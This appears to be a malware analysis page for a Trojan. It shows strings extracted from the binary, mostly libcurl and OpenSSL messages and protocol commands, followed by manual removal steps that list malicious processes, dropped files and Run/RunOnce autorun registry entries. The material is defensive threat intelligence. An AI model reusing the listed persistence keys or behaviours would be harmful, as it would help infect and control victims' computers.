Re-using existing connection! (#%ld) with host %s
%s://%s
<url> malformed
:]://%[^
[^:]:%[^
Protocol %s not supported or disabled in libcurl
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve proxy '%s'
Couldn't resolve host '%s'
IDN support not present, can't parse Unicode domains
Connection #%ld to host %s left intact
operation aborted by callback
ioctl callback returned error %d
the ioctl callback returned %d
seek callback returned error %d
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Problem (%d) in the Chunked-Encoded data
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Rewinding stream by : %zd bytes on url %s (zero-length body)
No URL set!
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
%5[^:]:%d:%5s
Disables POST, goes with %s
Violate RFC 2616/10.3.3 and switch from POST to GET
Violate RFC 2616/10.3.2 and switch from POST to GET
Issue another request to this URL: '%s'
[^?&/:]://%c
unspecified error %d
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
skipped cookie with bad tailmatch domain: %s
skipped cookie with illegal dotcount domain: %s
httponly
23[^;
=]=I99[^;
%s%s%s
WARNING: failed to save cookies in %s
# Fatal libcurl error
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
Send failure: %s
Recv failure: %s
[%s %s %s]
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getsockname() failed with errno %d: %s
getpeername() failed with errno %d: %s
Failed to connect to %s: %s
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
bind failed with errno %d: %s
Bind to local port %hu failed, trying next
Local port: %hu
Couldn't bind to '%s'
Name '%s' family %i resolved to '%s' family %i
Local Interface %s is ip %s using address family %i
TCP_NODELAY set
Could not set TCP_NODELAY: %s
Unable to parse FTP file list
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Access Violation
TFTP: File Not Found
Login denied
Issuer check against peer certificate failed
Invalid LDAP URL
Unrecognized or bad HTTP Content or Transfer-Encoding
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with given CA certificates
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
An unknown option was passed in to libcurl
A libcurl function was given a bad argument
Operation was aborted by an application callback
FTP: command REST failed
FTP: command PORT failed
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: weird server reply
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
URL using bad/illegal format or missing URL
Unsupported protocol
Unknown error %d (%#x)
Winsock version not supported
Protocol family not supported
Address family not supported
Operation not supported
Socket is unsupported
Protocol is unsupported
Protocol option is unsupported
Internal error removing splay node = %d
Internal error clearing splay node = %d
0123456789
libcurl is now using a weak random seed!
SSL Engine not supported
select/poll on SSL socket, errno: %d
SSL read: %s, errno %d
SSL: SSL_set_fd failed: %s
SSL: SSL_set_session failed: %s
CRLfile: %s
error loading CRL file: %s
CAfile: %s
CApath: %s
successfully set certificate verify locations:
error setting certificate verify locations, continuing anyway:
error setting certificate verify locations:
SSL: couldn't create a context: %s
Private key does not match the certificate public key
not supported file type for private key
file type P12 for private key not supported
file type ENG for private key not supported
unable to set private key file: '%s' type %s
not supported file type '%s' for certificate
file type P12 for certificate not supported
file type ENG for certificate not implemented
unable to use client certificate (no key found or wrong pass phrase?)
SSLv%c, %s%s (%d):
CERT verify
Client key exchange
Server key exchange
CERT
Client CERT
Request CERT
Client key
SSL connection using %s
Unknown SSL protocol error in connection to %s:%ld
SSL certificate problem, verify that the CA cert is OK. Details:
SSL certificate verify ok.
SSL certificate verify result: %s (%ld), continuing anyway.
SSL certificate verify result: %s (%ld)
SSL certificate issuer check ok (%s)
SSL: Certificate issuer check failed (%s)
SSL: Unable to read issuer cert (%s)
SSL: Unable to open issuer cert (%s)
issuer: %s
expire date: %s
start date: %s
subject: %s
Server certificate:
SSL: couldn't get peer certificate!
d-d-d d:d:d %s
common name: %s (matched)
common name: %s (does not match '%s')
SSL: certificate subject name '%s' does not match target host name '%s'
SSL: unable to obtain common name from peer certificate
SSL: illegal cert name field
subjectAltName does not match %s
subjectAltName: %s matched
pub_key
priv_key
RSA Public Key
RSA Public Key (%d bits)
Unable to load public key
Public Key Algorithm
Public Key Algorithm: %s
Expire date: %s
Start date: %s
Signature Algorithm: %s
Serial Number: %s
x%c
Issuer: %s
- Subject: %s
--- Certificate chain
%s: %s
x:
%s(%s)
%s: %s
Signature: %s
Cert
SSL_write() return error %d
SSL_write() error: %s
SSL_write() returned SYSCALL, errno = %d
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
--:--:--
%d.%d.%d.%d
%s%s%s%s%s%s
Session: %s
%s %s RTSP/1.0
Range: %s
Referer: %s
Accept-Encoding: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Transport: %s
Transport:
Refusing to issue an RTSP request [%s] without a session ID.
Got RTSP Session ID Line [%s], but wanted ID [%s]
Unable to read the CSeq header: [%s]
SMTPS
SMTP
LOGIN
Got unexpected smtp-server response: %d
EHLO %s
STARTTLS denied. %c
AUTH %s
AUTH %s %s
No known auth mechanisms supported!
Access denied: %d
HELO %s
%s xxxxxxxxxxxxxxxx
Authentication failed: %d
RCPT TO:<%s>
RCPT TO:%s
MAIL FROM:<%s>
MAIL FROM:%s
USER %s
PASS %s
Access denied. %c
Invalid message. %c
RETR %s
LIST %s
%s STARTTLS
%s LOGIN %s %s
%s FETCH 1 BODY[TEXT]
%s LOGOUT
%s SELECT %s
TFTP
bind() failed; %s
set timeouts for state %d; Total %ld, retry %d maxtry %d
TFTP response timeout
TFTP finished
tftp_send_first: internal error
%s%c%s%c
tftp_rx: internal error
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: giving up waiting for block %d
Received unexpected DATA packet block %d
tftp_tx: internal error, event: %i
tftp_tx: giving up waiting for block %d ack
Received ACK for block %d, expecting %d
invalid tsize -:%s:- value in OACK packet
%s (%ld)
%s (%d) %s (%d)
blksize is smaller than min supported
%s (%d)
blksize is larger than max supported
got option=(%s) value=(%s)
Couldn't open file %s
Last-Modified: %s, d %s M d:d:d GMT
Can't get the size of %s
Can't open %s for writing
There are more than %d entries
LDAP remote: %s
LDAP local: ldap_simple_bind_s %s
LDAP local: Cannot connect to %s:%hu
LDAP local: trying to establish %s connection
LDAP local: %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
CLIENT libcurl 7.22.0
DEFINE %s %s
MATCH %s %s %s
FreeLibrary(wsock2) failed (%d)
WSACloseEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACreateEvent failed (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to load WS2_32.DLL (%d)
WS2_32.DLL
insufficient winsock version to support telnet
WSAStartup failed (%d)
Sending data failed (%d)
%s %d %d
%s %s %d
%s %s %s
%s IAC %d
%s IAC %s
Syntax error in telnet option: %s
Unknown telnet option %s
7[^= ]%*[ =]%5s
USER,%s
%c%s%c%s
7[^,],7s
%c%c%c%c
%c%c%c%c%s%c%c
%d (unknown)
%s (unsupported)
%s IAC SB
FTPS
PORT
FTP response aborted due to select/poll error: %d
FTP response timeout
PRET command not accepted: d
Failed to MKD dir: d
CWD %s
MKD %s
QUOT command failed with d
Entry path is '%s'
PROT %c
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
Got a d ftp-server response when 220 was expected
Connect data stream passively
MDTM %s
SIZE %s
REST %d
PRET RETR %s
PRET STOR %s
PRET %s
%s %s
,%d,%d
%s |%d|%s|%hu|
bind() failed, we ran out of ports!
bind(port=%hu) failed: %s
socket failure: %s
Curl_resolv failed, we can not recover!
getsockname() failed: %s
STOR %s
APPE %s
Can't resolve new host %s:%hu
Can't resolve proxy host %s:%hu
Bad PASV/EPSV response: d
Skips %d.%d.%d.%d for data connection, uses %s instead
%d,%d,%d,%d,%d,%d
%c%c%c%u%c
Failed to do PORT
unsupported MDTM reply format
ddd d:d:d GMT
dddddd
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
Failed FTP upload:
RETR response: d
Access denied: d
ACCT %s
PBSZ %d
ACCT rejected by server: d
server did not report OK, got %d
Remembering we are in dir "%s"
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
Wildcard - "%s" skipped by user
Wildcard - START of "%s"
Uploading to a URL without a file name!
HTTPS
The requested URL returned error: %d
%s auth using %s with user '%s'
%sAuthorization: Basic %s
%s:%s
Last-Modified: %s
If-Unmodified-Since: %s
If-Modified-Since: %s
%s, d %s M d:d:d GMT
Failed sending HTTP request
Failed sending HTTP POST request
Content-Type: application/x-www-form-urlencoded
Internal HTTP POST error!
%s%s=%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
PTF://%s:%s@%s
Content-Range: bytes %s/%lld
Content-Range: bytes %s%lld/%lld
Range: bytes=%s
PTF://
Host: %s%s%s:%hu
Host: %s%s%s
Chunky upload is not supported by HTTP 1.0
%s, TE
HTTP/1.0 connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 proxy connection set to keep alive!
HTTP 1.0, assume close after body
RTSP/%d.%d =
HTTP =
HTTP/%d.%d =
HTTP error before end of send, stop sending
HTTP/
Avoided giant realloc for header (max is %d)!
%s, algorithm="%s"
%s, opaque="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop="%s", response="%s"
%s:%s:x:%s:%s:%s
%s:%.*s
%s:%s:%s
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
%sAuthorization: NTLM %s
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
SOCKS4%s request granted.
Failed to resolve "%s" for SOCKS4 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Failed to resolve "%s" for SOCKS5 connect.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 GSSAPI per-message authentication is not supported.
User was rejected by the SOCKS5 server (%d %d).
password
login
1.2.5
Error while processing content unencoding: %s
1.2.0.4
d:d
d:d:d
Received HTTP code %d from proxy after CONNECT
HTTP/1.%d %d
CONNECT %s:%hu HTTP/%s
%s%s%s%s
Host: %s
%s:%hu
Establish HTTP proxy tunnel to %s:%hu
%c%c%c=
%c%c==
0123456789-
.jpeg
.html
--%s--
couldn't open file "%s"
Content-Type: %s
; filename="%s"
Content-Disposition: attachment; filename="%s"
Content-Type: multipart/mixed, boundary=%s
%s; boundary=%s
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
KGS!@#$%.rnd
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
X.509 part of OpenSSL 1.0.0e 6 Sep 2011
OPENSSL_ALLOW_PROXY_CERTS
\X
unsupported or invalid name syntax
unsupported or invalid name constraint syntax
unsupported name constraint type
name constraints minimum and maximum not supported
Unsupported extension feature
invalid or inconsistent certificate policy extension
invalid or inconsistent certificate extension
key usage does not include digital signature
key usage does not include CRL signing
unable to get CRL issuer certificate
key usage does not include certificate signing
authority and subject key identifier mismatch
certificate rejected
certificate not trusted
unsupported certificate purpose
proxy certificates not allowed, please set the appropriate flag
invalid non-CA certificate (has CA markings)
invalid CA certificate
certificate revoked
certificate chain too long
unable to verify the first certificate
unable to get local issuer certificate
self signed certificate in certificate chain
self signed certificate
format error in certificate's notAfter field
format error in certificate's notBefore field
certificate has expired
certificate is not yet valid
certificate signature failure
unable to decode issuer public key
unable to decrypt certificate's signature
unable to get certificate CRL
unable to get issuer certificate
CERTIFICATE
cert_info
ASN.1 part of OpenSSL 1.0.0e 6 Sep 2011
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
Stack part of OpenSSL 1.0.0e 6 Sep 2011
Big Number part of OpenSSL 1.0.0e 6 Sep 2011
x%s
%s - d:d:d%.*s %d%s
%*s<Not Supported>
%*s%s
%*s%s:
OpenSSL 1.0.0e 6 Sep 2011
MD5 part of OpenSSL 1.0.0e 6 Sep 2011
libdes part of OpenSSL 1.0.0e 6 Sep 2011
DES part of OpenSSL 1.0.0e 6 Sep 2011
MD4 part of OpenSSL 1.0.0e 6 Sep 2011
RAND part of OpenSSL 1.0.0e 6 Sep 2011
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
lhash part of OpenSSL 1.0.0e 6 Sep 2011
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
TRUSTED CERTIFICATE
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
RSA PRIVATE KEY
DSA PRIVATE KEY
EC PRIVATE KEY
X509 CERTIFICATE
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
RSA part of OpenSSL 1.0.0e 6 Sep 2011
DSA part of OpenSSL 1.0.0e 6 Sep 2011
.\crypto\ec\ec_key.c
Diffie-Hellman part of OpenSSL 1.0.0e 6 Sep 2011
value.single
value.set
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
%d.%d.%d.%d/%d.%d.%d.%d
ddddddZ
ddddddZ
<ASN1 %d>
appl [ %d ]
cont [ %d ]
priv [ %d ]
'() ,-./:=?
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
PROXY_CERT_INFO_EXTENSION
PEM part of OpenSSL 1.0.0e 6 Sep 2011
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
AUTHORITY_KEYID
keyid
X509_CERT_PAIR
X509_CERT_AUX
%lu:%s:%s:%d:%s
%sx - <SPACES/NULS>
x -
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
pubkey
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
.\crypto\evp\evp_pkey.c
NETSCAPE_CERT_SEQUENCE
certs
.\crypto\pem\pem_pkey.c
.\crypto\asn1\x_pkey.c
EC part of OpenSSL 1.0.0e 6 Sep 2011
.\crypto\dh\dh_key.c
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
SHA1 part of OpenSSL 1.0.0e 6 Sep 2011
SHA-256 part of OpenSSL 1.0.0e 6 Sep 2011
SHA-512 part of OpenSSL 1.0.0e 6 Sep 2011
<unsupported>
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:<unsupported>
X400Name:<unsupported>
othername:<unsupported>
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
EVP part of OpenSSL 1.0.0e 6 Sep 2011
?456789:;<=
!"#$%&'()* ,-./0123
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
.\crypto\x509v3\v3_akey.c
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
RIPE-MD160 part of OpenSSL 1.0.0e 6 Sep 2011
SHA part of OpenSSL 1.0.0e 6 Sep 2011
CAST part of OpenSSL 1.0.0e 6 Sep 2011
Blowfish part of OpenSSL 1.0.0e 6 Sep 2011
RC2 part of OpenSSL 1.0.0e 6 Sep 2011
IDEA part of OpenSSL 1.0.0e 6 Sep 2011
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
keylength
keyfunc
.\crypto\pkcs12\p12_key.c
ECDSA part of OpenSSL 1.0.0e 6 Sep 2011
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
CONF part of OpenSSL 1.0.0e 6 Sep 2011
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
CONF_def part of OpenSSL 1.0.0e 6 Sep 2011
[[%s]]
[%s] %s=%s
Verifying - %s
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
ECDH part of OpenSSL 1.0.0e 6 Sep 2011
%s.dll
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT56
EXPORT40
EXPORT
wrong number of key bits
unsupported status type
unsupported ssl version
unsupported protocol
unsupported elliptic curve
unsupported digest type
unsupported compression algorithm
unsupported cipher
unknown pkey type
unknown key exchange type
unknown certificate type
unable to find public key parameters
unable to extract public key
unable to decode ecdh certs
unable to decode dh certs
tried to use unsupported cipher
tls peer did not respond with certificate list
tls client cert req with anon cipher
tlsv1 unsupported extension
tlsv1 certificate unobtainable
tlsv1 bad certificate status response
tlsv1 bad certificate hash value
tlsv1 alert export restriction
sslv3 alert unsupported certificate
sslv3 alert no certificate
sslv3 alert certificate unknown
sslv3 alert certificate revoked
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
cas.exe:3804
W15R20Q1Q1.exe:1980
%original file name%.exe:4008
wincom_FYV.exe:192
W15R20Q1Q1.tmp:2228
8G0VBB.exe:2788
R3VW2WN639.exe:2760
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\YW6DQ3G9K4\50U0P6CTE.exe.config (1 bytes)
%Program Files%\YW6DQ3G9K4\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\cast.config (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-GQPFO.tmp\W15R20Q1Q1.tmp (1415 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-SGBAU.tmp\0861e59c41bb5f407dacedf51edab54f.tmp (1414 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\mfi8FD2.tmp (78068 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\gch8FD3.tmp (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tuto_monetize_120161205\tuto_monetize_120161205\2.00\cnf.cyl (144 bytes)
%Program Files%\mpck\unins000.dat (1374 bytes)
%Program Files%\mpck\is-9N7HB.tmp (23473 bytes)
%Program Files%\mpck\is-FHO2R.tmp (23062 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-8IB5S.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\asasa.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe (19468 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\advise.exe (145773 bytes)
%Program Files%\mpck\config.conf (35 bytes)
%Program Files%\mpck\wincom_FYV.exe (335632 bytes)
%Program Files%\mpck\uninstaller.exe (66563 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\W15R20Q1Q1.exe (81615 bytes)
%Program Files%\mpck\8G0VBB.exe (49754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\9VW7H7KFES.exe (7853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\R3VW2WN639.exe (26266 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\idp.dll (1493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\setup.exe (130856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\asasa.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\appsoft.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\cas.exe (744 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\asasa.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\cas.exe.config.config (1 bytes)
%Program Files%\YW6DQ3G9K4\cast.config (37 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"N5WHVTE233" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\9VW7H7KFES.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VA5YBTJ0T5" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OTUTPRODUCT_6NAS9" = "%Program Files%\mpck\8G0VBB.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WINCOMFYV" = "%Program Files%\mpck\wincom_FYV.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_COMG6" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\R3VW2WN639.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"JQRO84EYHS" = "%Program Files%\YW6DQ3G9K4\50U0P6CTE.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.